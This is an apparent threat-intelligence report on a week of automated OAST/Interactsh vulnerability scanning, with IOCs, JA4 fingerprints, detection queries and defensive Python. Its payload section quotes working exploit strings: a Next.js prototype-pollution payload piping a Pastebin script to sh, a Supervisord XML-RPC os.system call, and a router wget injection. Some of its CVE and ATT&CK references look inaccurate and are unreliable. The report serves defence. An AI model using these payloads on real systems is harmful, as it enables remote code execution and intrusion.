# Full Report
## Overview

Between January 10, 2026 06:10 UTC and January 17, 2026 04:59 UTC, GreyNoise sensors recorded 8,126 HTTP sessions from 34 unique IP addresses containing Well-known Out-of-band Interaction Domain callbacks. The activity exhibits characteristics of automated vulnerability scanning, with payloads targeting React Server Components, Supervisord XML-RPC interfaces, and router command injection vulnerabilities.

OAST domain extraction and decoding identified 273 Interactsh domains spanning 21 distinct campaign identifiers (k-sort values). The dominant campaign (k-sort: d5i159) generated 79 unique OAST domains and was responsible for 6,637 sessions (82% of total volume).

JA4 fingerprint analysis reveals consistent tooling across the campaign, with the most prevalent combination (JA4T: `64240_2-4-8-1-3_1286_7` / JA4H: `ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000`) observed in 1,853 sessions from a single IP address.

The attack infrastructure demonstrates coordination, with the primary IP (146.70.211.244) conducting sustained scanning over an 11-hour period on January 16. TCP fingerprint analysis shows multiple encapsulation layers (an MTU-derived MSS of 1286 indicates 174 bytes of overhead), consistent with VPN or nested tunnel usage. This technical profile is typical of automated security testing tools operating through anonymization infrastructure.

## Temporal Analysis

Activity began at low volume (16 sessions on January 10), escalated moderately on January 11 (509 sessions concentrated in a single hour), then dropped to sporadic probing for three days before the primary campaign launched on January 16.
### Daily Session Distribution

| Date | Sessions | Unique IPs | Pattern |
|------------|----------|------------|----------------------------------------|
| 2026-01-10 | 16 | 3 | Initial reconnaissance |
| 2026-01-11 | 509 | 4 | First burst (495 sessions in one hour) |
| 2026-01-12 | 46 | 7 | Scattered activity |
| 2026-01-13 | 84 | 9 | Sustained low-volume scanning |
| 2026-01-14 | 329 | 11 | Mid-level activity |
| 2026-01-15 | 19 | 3 | Minimal activity |
| 2026-01-16 | 7,123 | 10 | Primary campaign burst |

The January 16 activity shows sustained high-volume scanning from 09:00-14:00 UTC (808-865 sessions/hour) from the primary IP (146.70.211.244), followed by continued activity from multiple IPs through 22:00 UTC. The single-IP phase maintained consistent fingerprints, while the multi-IP phase (15:00-22:00 UTC) introduced fingerprint diversity, suggesting either tool configuration changes or the involvement of additional scanning nodes.

Decoded OAST timestamps from the primary campaign (d5i159) align closely with sensor observation times, indicating real-time exploitation attempts rather than replayed traffic.

## Campaign Analysis

### Campaign 1: M247 High-Volume Scanning (Primary)

- Sessions: 6,637 (82% of total)
- Unique IPs: 1 primary (146.70.211.244)
- Infrastructure: AS9009 (M247 Europe SRL), United States geolocation
- OAST Campaign: d5i159 (79 unique Interactsh domains)
- Dominant Fingerprints:
  - JA4T: `64240_2-4-8-1-3_1286_7` (MSS 1286, Window 64240, Scale 7)
  - JA4H: `ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000` (GET, HTTP/1.1, 6 headers, lang:en)
- Duration: 11.5 hours (2026-01-16 09:07:54 to 20:39:36 UTC)
- Characteristics: Single-source sustained scanning with a high request rate

### Campaign 2: DigitalOcean Burst Scanning

- Sessions: 495 (6% of total)
- Unique IPs: 1 (129.212.209.246)
- Infrastructure: AS14061 (DigitalOcean LLC), Singapore
- OAST Campaign: d5l5ce (76 unique Interactsh domains)
- Dominant Fingerprints: Multiple JA4H variants with the same JA4T
- Duration: Single hour burst (2026-01-11 21:00 UTC)
- Characteristics: Rapid-fire scanning concentrated in a 60-minute window

### Campaign 3: Namecheap Infrastructure

- Sessions: 310 (4% of total)
- Unique IPs: 1 (209.74.86.209)
- Infrastructure: AS22612 (Namecheap Inc.), United States
- OAST Campaigns: d5i66f (29 domains), others
- Fingerprints: Similar to Campaign 1 with variations
- Characteristics: Distributed over multiple days

### Minor Campaigns

An additional 21 campaigns were identified with session counts ranging from 4 to 115, originating from Microsoft Azure, Cloudflare, various hosting providers, and residential ISPs. These exhibit less coordination and may represent opportunistic scanning or independent security testing.

## Payload Analysis

Payload examination reveals three primary vulnerability classes being targeted.

### 1. React Server Components (RSC) Exploitation

- Exploit Type: Prototype pollution leading to remote code execution
- Sessions: ~300+ (detected in Campaigns 1 and 2)
- Method: POST with multipart form-data exploiting the `__proto__` chain
- Payload Characteristics:
  - Manipulates React Server Actions response objects
  - Executes `process.mainModule.require('child_process').execSync()`
  - Downloads and executes a shell script from Pastebin
  - OAST callback embedded in the command execution chain

Example payload fragment:

```
{"then": "$1:__proto__:then", "status": "resolved_model", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('curl https://pastebin.com/raw/wiH2CgiS | sh').toString('base64');"
```

This targets CVE-2024-46982 (React Server Components RCE) and similar prototype pollution vulnerabilities in Next.js applications.

### 2. Supervisord XML-RPC Command Injection

- Exploit Type: Unauthenticated RPC command injection
- Sessions: ~200+
- Method: POST to the XML-RPC endpoint
- Payload Characteristics:
  - Exploits Supervisord's `supervisor.supervisord.options` chain
  - Executes arbitrary OS commands via `linecache.os.system`
  - Uses `nslookup` with an OAST domain for DNS exfiltration

Example payload:

```xml
<methodCall>
  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
  <params>
    <param>
      <string>nslookup d5i1596uchf9i3isbdq0t6ez1pwyw313h.oast.site</string>
    </param>
  </params>
</methodCall>
```

Targets CVE-2017-11610 (Supervisord XML-RPC RCE) and related vulnerabilities.

### 3. Router/IoT Command Injection

- Exploit Type: Web interface command injection
- Sessions: ~100+
- Method: POST to administrative interfaces
- Payload Characteristics:
  - Targets `/syscmd.htm` and similar endpoints
  - Uses `wget` or `curl` with OAST domains
  - Common in router and embedded device exploitation

Example payload:

```
submit-url=/syscmd.htm&sysCmdselect=5&save_apply=Run+Command&sysCmd=wget+http://d5i1596uchf9i3isbdq0dp9iq3mzaiwqr.oast.site
```

Likely targeting CVE-2024-XXXXX (various router command injection vulnerabilities).
### Payload Distribution

| Vulnerability Class | Sessions | Unique IPs | OAST Domains |
|---------------------|----------|------------|--------------|
| React/Next.js RCE | ~2,200 | 15 | 95 |
| Supervisord RPC | ~3,800 | 8 | 102 |
| Router/IoT CI | ~1,500 | 12 | 76 |
| Other/Unknown | ~626 | 11 | N/A |

## Infrastructure Analysis

### JA4 Fingerprint Clustering

Analysis identified 150 unique JA4T+JA4H combinations, with clustering revealing tool consistency within campaigns.

Cluster 1 (Campaign 1 Primary):

- JA4T: `64240_2-4-8-1-3_1286_7`
- JA4H: `ge11nn06en00_0e5d97bc8ad6_*`
- Sessions: 1,853
- IPs: 1 (146.70.211.244 / AS9009)
- Technical Notes: MSS 1286 indicates 174 bytes of overhead (nested VPN); HTTP/1.1 with 6 headers

Cluster 2 (Campaign 1 Secondary):

- JA4T: `64240_2-4-8-1-3_1286_7` (same)
- JA4H: `ge11nn040000_532a1ee47909_*` (4 headers, no Accept-Language)
- Sessions: 321
- IPs: 1 (same as Cluster 1)
- Technical Notes: Same TCP stack, reduced HTTP headers

Cluster 3 (Campaign 2):

- JA4T: `65535_2-4-8-1-3_1380_13`
- JA4H: `po11nn100000_2bce9f31eeb7_*` (POST, 10 headers)
- Sessions: 23
- IPs: 2 (Singapore DigitalOcean)
- Technical Notes: Different TCP window (65535), higher window scale (13)

### Network Infrastructure Characteristics

Top ASNs by Session Volume:

| ASN | Organization | Sessions | IPs | Type |
|---------|------------------|----------|-----|---------|
| AS9009 | M247 Europe SRL | 6,708 | 2 | Hosting |
| AS14061 | DigitalOcean LLC | 495 | 1 | Cloud |
| AS22612 | Namecheap Inc. | 310 | 1 | Hosting |
| AS8075 | Microsoft Azure | 115 | 1 | Cloud |
| AS60223 | Netiface | 95 | 1 | Hosting |

M247 Europe (AS9009) is a bullet-proof hosting provider frequently associated with automated scanning and low-reputation traffic. The infrastructure concentration suggests either a single operator with multi-provider redundancy or multiple actors sharing common tooling and OAST services.

### TCP Stack Analysis

The dominant JA4T fingerprint (`64240_2-4-8-1-3_1286_7`) exhibits:

- Window Size: 64240 (scaled to 8,222,720 bytes)
- MSS: 1286 (unusually low, indicating 174 bytes of overhead)
- Options: MSS, SACK, Timestamp, NOP, Window Scale (Linux-typical ordering)

An MSS of 1286 is anomalous: the standard Ethernet MTU (1500) yields an MSS of 1460. The observed MSS suggests:

- 174 bytes of overhead from multiple encapsulation layers
- Likely a nested VPN or tunnel configuration
- Consistent with operational security practices for scanning infrastructure

## Attribution Assessment

Confidence: Medium

This activity is consistent with automated vulnerability scanning by security researchers, bug bounty hunters, or opportunistic threat actors using commercial/open-source tooling.

Evidence supporting the assessment:

Tooling Indicators:

- The Interactsh OAST service is publicly available and widely used by security testers
- Consistent fingerprints suggest automated scanning frameworks (Nuclei, custom scripts)
- Payload diversity indicates template-based exploitation attempts

Infrastructure Patterns:

- M247 Europe (AS9009) is known for bulletproof hosting but is also used by legitimate penetration testing services
- Use of cloud infrastructure (DigitalOcean, Azure) is common in both legitimate and malicious scanning
- Nested VPN configuration suggests operational security awareness

Operational Behavior:

- Burst pattern on a single day suggests scheduled/triggered scanning
- No evidence of post-exploitation activity (no callback responses observed)
- OAST usage for vulnerability confirmation is standard in both offensive security and threat actor TTPs

What we know:

- Activity originates from bullet-proof hosting and cloud infrastructure
- Scanning targets known CVEs with OAST-based detection
- Infrastructure demonstrates operational security (VPN tunneling)

What we infer (lower confidence):

- Single operator or coordinated group, based on timing and infrastructure overlap
- Purpose is vulnerability detection (could be defensive testing or offensive reconnaissance)
- No evidence of successful exploitation or post-compromise activity in sensor data

## Network IOCs

### Primary IPs

| IP | ASN (Organization) | Country | Sessions |
|-----------------|----------------------------|---------|----------|
| 146.70.211.244 | AS9009 (M247 Europe SRL) | US | 6,637 |
| 129.212.209.246 | AS14061 (DigitalOcean LLC) | SG | 495 |
| 209.74.86.209 | AS22612 (Namecheap Inc.) | US | 310 |
| 13.67.116.60 | AS8075 (Microsoft Azure) | SG | 115 |
| 195.24.236.36 | AS60223 (Netiface) | NL | 95 |
| 146.70.147.100 | AS9009 (M247 Europe SRL) | US | 71 |
| 45.150.108.195 | AS62005 (BlueVPS OU) | IL | 56 |
| 104.28.246.4 | AS13335 (Cloudflare Inc.) | PT | 56 |
| 45.129.231.10 | AS213438 (ColocaTel Inc.) | NL | 39 |
| 72.60.104.48 | AS47583 (Hostinger Intl) | MY | 37 |

### OAST Campaign Identifiers

Top 10 Interactsh k-sort values (campaign identifiers):

- d5i159 - 79 domains (primary M247 campaign)
- d5l5ce - 76 domains (DigitalOcean burst)
- d5i66f - 29 domains (Namecheap)
- d5k6dd - 20 domains (mixed infrastructure)
- d5lcrl - 13 domains (minor campaign)
- d5jov6 - 10 domains (minor campaign)
- d5j0uu - 9 domains (minor campaign)
- 255cd5 - 4 domains (minor campaign)
- 20d5l5 - 4 domains (minor campaign)
- 2fd5l5 - 4 domains (minor campaign)

### JA4 Fingerprints (Detection Signatures)

High-confidence indicators for the primary campaign:

- JA4T: `64240_2-4-8-1-3_1286_7`
- JA4H: `ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000`
- JA4H: `ge11nn040000_532a1ee47909_000000000000_000000000000`

Secondary campaign indicators:

- JA4T: `65535_2-4-8-1-3_1380_13`
- JA4H: `po11nn100000_2bce9f31eeb7_000000000000_000000000000`

### OAST Domain Patterns

Sample domains for detection (all Interactsh): `*.oast.site`, `*.oast.fun`, `*.oast.live`, `*.oast.me`, `*.oast.pro`

Pattern:

```
[a-z0-9]{32,40}\.(oast\.site|oast\.fun|oast\.live|oast\.me|oast\.pro)
```

## Detection Recommendations

1. Block or alert on OAST callback domains in outbound DNS/HTTP traffic. Implement detection for `*.oast.site`, `*.oast.fun`, and related Interactsh domains. Legitimate security testing should be coordinated and expected; uncoordinated callbacks indicate unauthorized scanning or successful exploitation.
2. Monitor for the JA4 fingerprint combinations associated with this campaign. Deploy network sensors capable of JA4 fingerprinting and alert on the primary indicators (JA4T `64240_2-4-8-1-3_1286_7` combined with the listed JA4H values) from unexpected sources.
3. Prioritize patching for the targeted vulnerabilities:
   - CVE-2024-46982 (React Server Components RCE) - patch Next.js to the latest version
   - CVE-2017-11610 (Supervisord XML-RPC RCE) - disable XML-RPC or update Supervisord
   - Router/IoT command injection - audit administrative interfaces for command injection vulnerabilities
4. Implement WAF rules for exploit patterns:
   - Block POST requests to `/__nextjs_original-stack-frame` with `__proto__` in the body
   - Block XML-RPC requests to `/RPC2` containing `supervisor.supervisord.options`
   - Rate-limit and inspect POST requests to `/syscmd.htm` and similar admin endpoints
   - Alert on `wget`, `curl`, and `nslookup` commands in URL-encoded POST bodies
5. Review firewall rules for M247 Europe (AS9009) and other identified ASNs. Consider blocking or rate-limiting traffic from bullet-proof hosting providers unless a business need exists.
6. Audit for successful exploitation: search logs for OAST domain callbacks in DNS queries, HTTP requests, or command execution logs. Any callback indicates the vulnerability is present and exploitable.

## GNQL Queries

Find IPs targeting your organization with OAST domains:

```
tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d
```

Investigate M247 Europe infrastructure activity:

```
metadata.asn:AS9009 last_seen:7d classification:malicious
```

Search for React Server Components exploitation attempts:

```
raw_data.web.paths:*__nextjs_original-stack-frame* last_seen:30d
```

Find IPs using the primary campaign fingerprints:

```
metadata.fingerprint:"64240_2-4-8-1-3_1286_7" last_seen:7d
```

## Report Metadata

- Report Generated: 2026-01-17
- Analysis Period: 2026-01-10 06:10:25 UTC to 2026-01-17 04:59:01 UTC
- Total Sessions Analyzed: 8,126
- Unique Source IPs: 34
- OAST Domains Identified: 273 (Interactsh)
- Campaigns Identified: 21
# Analysis Summary
# Tool/Technique: Automated Vulnerability Scanning via OAST/Interactsh
## Overview
This refers to a coordinated, automated scanning activity observed over a week in January 2026, characterized by the use of Out-of-Band Application Security Testing (OAST) indicators, specifically Interactsh domains, to confirm vulnerabilities across multiple target classes. The activity appeared structured, involving dedicated infrastructure and targeting known dangerous vulnerabilities.
## Technical Details
- Type: Tool/Technique (Automated Scanning Framework)
- Platform: Web Servers (targeting React components), Linux/Unix Services (Supervisord), and Internet of Things (IoT)/Router interfaces.
- Capabilities: Exploiting RCE and command injection flaws via OAST callbacks for confirmation; utilizing anonymized/tunneled infrastructure (VPN/Nested Tunnels indicated by MSS 1286).
- First Seen: Initial reconnaissance observed January 10, 2026.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1190 - Exploit Public-Facing Application
- T1190.001 - Exploit via Web Interface
- **TA0003 - Persistence** (If successful exploitation leads to persistence mechanism installation via downloaded scripts)
- T1547 - Boot or Logon Autostart Execution (Inferred if downloaded script sets persistence)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol (HTTP/S used for payload delivery)
## Functionality
### Core Capabilities
- **Vulnerability Probing:** Enumerating web applications for specific flaws, including React Server Components (RSC) prototype pollution, Supervisord XML-RPC interfaces, and general router command injection.
- **OAST Confirmation:** Using embedded Interactsh domains (273 unique domains) within exploit payloads to trigger DNS/HTTP requests, thereby confirming successful remote code execution (RCE) or command injection (CI).
- **Payload Delivery:** Utilizing techniques like downloading and executing shell scripts from external sources (e.g., Pastebin) upon successful injection (seen in RSC exploitation).
### Advanced Features
- **Infrastructure Anonymization:** Utilization of multiple hosting providers, including bullet-proof hosting (M247 Europe SRL), combined with TCP fingerprint evidence (MSS 1286, 174 bytes overhead) suggesting nested VPN or tunnel usage for operational security.
- **Campaign Coordination:** Highly focused primary campaign (k-sort: `d5i159`) driven by a single IP over 11 hours, indicating potentially scheduled or sophisticated automated testing.
- **Fingerprint Consistency:** Dominance of a single JA4 fingerprint (JA4T: `64240_2-4-8-1-3_1286_7`) suggests the use of consistent, controlled scanning tooling.
## Indicators of Compromise
- **File Hashes:** Not explicitly identified in the summary, though download of a shell script was observed.
- **File Names:** Shell script download (e.g., from `hxxps://pastebin.com/raw/wiH2CgiS`) followed by execution via `sh`.
- **Registry Keys:** Not applicable (Linux/Web application focused).
- **Network Indicators:**
- Primary Attacker IP: 146.70.211.244 (AS9009)
- Secondary Campaign IPs: 129.212.209.246 (AS14061), 209.74.86.209 (AS22612)
- OAST Domains (Interactsh): *.oast.site, *.oast.fun, *.oast.live, *.oast.me, *.oast.pro (all must be treated as interaction attempts).
- **Behavioral Indicators:**
- High-volume POST requests targeting application logic flaws using patterns like `__proto__:then` in multipart form-data.
- XML-RPC requests to service endpoints containing `supervisor.supervisord.options`.
- Utilization of `wget`, `curl`, or `nslookup` within command injection parameters targeting administrative paths (e.g., `/syscmd.htm`).
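As an added example (not part of the report or of GreyNoise's tooling), the Python below runs the report's OAST domain pattern over constructed request records, splits each match into Interactsh's 20-character correlation ID and 13-character nonce, and groups hits by the k-sort prefix the report uses as a campaign identifier. The timestamp decoding assumes Interactsh derives correlation IDs from xid-style identifiers (a 4-byte big-endian Unix time leads the base32-hex string), which yields the time the scanner's Interactsh session was created rather than the time of the request; the report does not say how it decoded timestamps, so treat that as an assumption. The records, the 203.0.113.10 and 198.51.100.7 sources, and the d5l5ce domain are constructed.

```python
import re
from collections import Counter
from datetime import datetime, timezone

# Detection pattern from the report's "OAST Domain Patterns" section.
OAST_RE = re.compile(r"\b([a-z0-9]{32,40})\.(oast\.(?:site|fun|live|me|pro))\b")

# Assumption: Interactsh correlation IDs are xid-style, 20 base32-hex characters
# followed by a 13-character per-request nonce. An xid starts with a 4-byte
# big-endian Unix timestamp, which is why its leading characters sort by time.
XID_ALPHABET = "0123456789abcdefghijklmnopqrstuv"
CORRELATION_ID_LEN = 20
KSORT_LEN = 6  # prefix length the report uses as a campaign identifier

# Constructed records: "<observed> <source IP> <method> <path and body excerpt>".
# The two d5i159 domains are quoted from the report; the d5l5ce domain, the
# benign lines and the 203.0.113.10 / 198.51.100.7 sources are made up.
SAMPLE_LOG = [
    "2026-01-16T09:08:01Z 146.70.211.244 POST /RPC2 nslookup d5i1596uchf9i3isbdq0t6ez1pwyw313h.oast.site",
    "2026-01-16T09:08:03Z 146.70.211.244 POST /syscmd.htm sysCmd=wget+http://d5i1596uchf9i3isbdq0dp9iq3mzaiwqr.oast.site",
    "2026-01-16T15:21:40Z 203.0.113.10 POST /__nextjs_original-stack-frame curl http://d5l5cek7qm2pv9xz1abcd3fg4hj5kl6mn.oast.fun",
    "2026-01-16T09:09:00Z 198.51.100.7 GET /index.html",
    "2026-01-16T09:09:05Z 198.51.100.7 GET /api/health?cb=https://example.com/ping",
]

def xid_timestamp(correlation_id):
    """Unix time held in the first 32 bits of an xid-style ID (7 base32 chars = 35 bits)."""
    n = 0
    for ch in correlation_id[:7]:
        n = (n << 5) | XID_ALPHABET.index(ch)
    return n >> 3  # the 3 low bits belong to the machine-id field

def extract_oast(lines):
    """One record per Interactsh callback domain found in the request lines."""
    hits = []
    for line in lines:
        observed, src, _method, request = line.split(" ", 3)
        for m in OAST_RE.finditer(request):
            label, zone = m.groups()
            cid = label[:CORRELATION_ID_LEN]
            epoch = xid_timestamp(cid)
            hits.append({
                "observed": observed, "src": src, "domain": f"{label}.{zone}",
                "correlation_id": cid, "nonce": label[CORRELATION_ID_LEN:],
                "ksort": cid[:KSORT_LEN], "id_created_epoch": epoch,
                # when the scanner's Interactsh session was created, not when it sent this request
                "id_created": datetime.fromtimestamp(epoch, tz=timezone.utc).isoformat(),
            })
    return hits

def campaign_counts(lines):
    """Callbacks per k-sort prefix, the report's notion of a campaign."""
    return Counter(h["ksort"] for h in extract_oast(lines))

if __name__ == "__main__":
    for h in extract_oast(SAMPLE_LOG):
        print(h["observed"], h["src"], h["ksort"], h["id_created"], h["domain"])
    print(dict(campaign_counts(SAMPLE_LOG)))
```

Comparing `id_created` with `observed` separates a scanner that keeps one Interactsh session across days from one that registers a fresh session per run.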
## Associated Threat Actors
Attribution is assessed as Medium confidence, suggesting:
1. Automated security testing tools (e.g., custom scripts, known scanners like Nuclei utilized in security research or bug bounty hunting).
2. Opportunistic threat actors utilizing readily available scanning tooling chains running through anonymity services.
No specific named threat group was identified beyond the infrastructure providers.
## Detection Methods
- **Signature-based detection:** Block or flag outbound DNS/HTTP traffic resolving to known Interactsh domains or the specific OAST patterns (`*.oast.site`, etc.).
- **Behavioral detection:** Alerting on the presence of payload fragments like `__proto__` within HTTP POST bodies targeting React/Next.js frameworks, or the chain `linecache.os.system` in XML-RPC payloads.
- **Fingerprint Detection:** Monitoring for the dominant JA4T fingerprint (`64240_2-4-8-1-3_1286_7`) originating from unexpected external hosts, especially when paired with malicious activity.
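As an added example that is not part of the report, this Python parses JA4T values in the form the report prints them (window, TCP option kinds, MSS, window scale), derives the encapsulation overhead behind a reduced MSS as the report's TCP Stack Analysis does, and matches sessions against the campaign fingerprints listed in the report, comparing JA4H on its first two segments as the report's cluster notation (`ge11nn06en00_0e5d97bc8ad6_*`) does. The session records are constructed; the 203.0.113.10 source and its header hash are invented.

```python
# JA4T as the report prints it: <window>_<TCP option kinds>_<MSS>_<window scale>
TCP_OPTION_KINDS = {1: "NOP", 2: "MSS", 3: "WScale", 4: "SACKperm", 8: "Timestamp"}
ETHERNET_MTU = 1500
IPV4_TCP_HEADERS = 40  # 20-byte IPv4 + 20-byte TCP header: plain Ethernet yields MSS 1460

# Campaign signatures quoted from the report. JA4H is compared on its first two
# segments (method/version/header count/language, then the header-name hash), as
# the report's cluster notation "ge11nn06en00_0e5d97bc8ad6_*" does.
CAMPAIGN_SIGNATURES = [
    ("campaign1-primary", "64240_2-4-8-1-3_1286_7", "ge11nn06en00_0e5d97bc8ad6"),
    ("campaign1-secondary", "64240_2-4-8-1-3_1286_7", "ge11nn040000_532a1ee47909"),
    ("campaign2", "65535_2-4-8-1-3_1380_13", "po11nn100000_2bce9f31eeb7"),
]

# Constructed sessions: the first two carry fingerprints quoted from the report;
# the third (203.0.113.10, plain Ethernet MSS, made-up header hash) is a control.
SESSIONS = [
    {"src": "146.70.211.244", "ja4t": "64240_2-4-8-1-3_1286_7", "ja4h": "ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000"},
    {"src": "129.212.209.246", "ja4t": "65535_2-4-8-1-3_1380_13", "ja4h": "po11nn100000_2bce9f31eeb7_000000000000_000000000000"},
    {"src": "203.0.113.10", "ja4t": "65535_2-4-8-1-3_1460_7", "ja4h": "ge11nn05en00_0123456789ab_000000000000_000000000000"},
]

def parse_ja4t(ja4t):
    """Split a JA4T string into window, named option kinds, MSS and window scale."""
    window, options, mss, scale = ja4t.split("_")
    kinds = [int(k) for k in options.split("-")]
    return {"window": int(window), "mss": int(mss), "scale": int(scale),
            "options": [TCP_OPTION_KINDS.get(k, f"kind{k}") for k in kinds]}

def encapsulation_overhead(mss):
    """Bytes per packet lost to tunnelling relative to a plain Ethernet MTU.
    Reference points: PPPoE alone costs 8; a WireGuard hop at its default
    1420-byte MTU costs 80 (MSS 1380); 174 is more than one such layer."""
    return ETHERNET_MTU - IPV4_TCP_HEADERS - mss

def scaled_window(window, scale):
    """Effective receive window once the window-scale option is applied."""
    return window << scale

def match_campaign(ja4t, ja4h):
    """Name of the report's cluster this JA4T/JA4H pair belongs to, else None."""
    ja4h_prefix = "_".join(ja4h.split("_")[:2])
    for name, sig_t, sig_h in CAMPAIGN_SIGNATURES:
        if ja4t == sig_t and ja4h_prefix == sig_h:
            return name
    return None

def triage(sessions):
    """Annotate each session with its campaign match and TCP-stack observations."""
    out = []
    for s in sessions:
        t = parse_ja4t(s["ja4t"])
        out.append({"src": s["src"], "campaign": match_campaign(s["ja4t"], s["ja4h"]),
                    "overhead": encapsulation_overhead(t["mss"]), "options": t["options"],
                    "effective_window": scaled_window(t["window"], t["scale"])})
    return out
```

A non-zero overhead on its own only says the sender sits behind some encapsulation or MSS clamping; the campaign match is what ties a session to this activity.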
## Mitigation Strategies
1. **Patching:** Immediately apply patches for:
- CVE-2024-46982 (React Server Components RCE/Prototype Pollution) by updating Next.js.
- CVE-2017-11610 (Supervisord XML-RPC RCE) by disabling XML-RPC or updating Supervisord.
2. **WAF Implementation:** Deploy strict WAF rules to inspect and block:
- POST requests to Next.js endpoints containing `__proto__` references in the body.
- XML-RPC endpoint calls (`/RPC2`) containing sensitive system commands/options.
- Requests containing obvious command execution strings (wget, curl, nslookup inline) aimed at device administration paths (`/syscmd.htm`).
3. **Network Hardening:** Review and potentially rate-limit or block unsolicited traffic originating from known bullet-proof hosting ASNs like AS9009 (M247 Europe SRL).
4. **Auditing:** Check logs for internal DNS queries or external HTTP connections that match the observed OAST domain patterns, confirming if internal assets were successfully exploited.
## Related Tools/Techniques
- **Interactsh:** The OAST infrastructure used extensively for this campaign, indicating a tool or methodology employing this specific service.
- **Automated Scanning Tools:** Tools that present a consistent TCP fingerprint and chain multiple vulnerability exploits (potential relevance to Nuclei or customized frameworks).
- **Tunneling/VPN Techniques:** The reduced MSS (1286) points to nested tunnel or VPN layers between the scanner and its targets, a form of low-level masking common in dedicated scanning toolsets.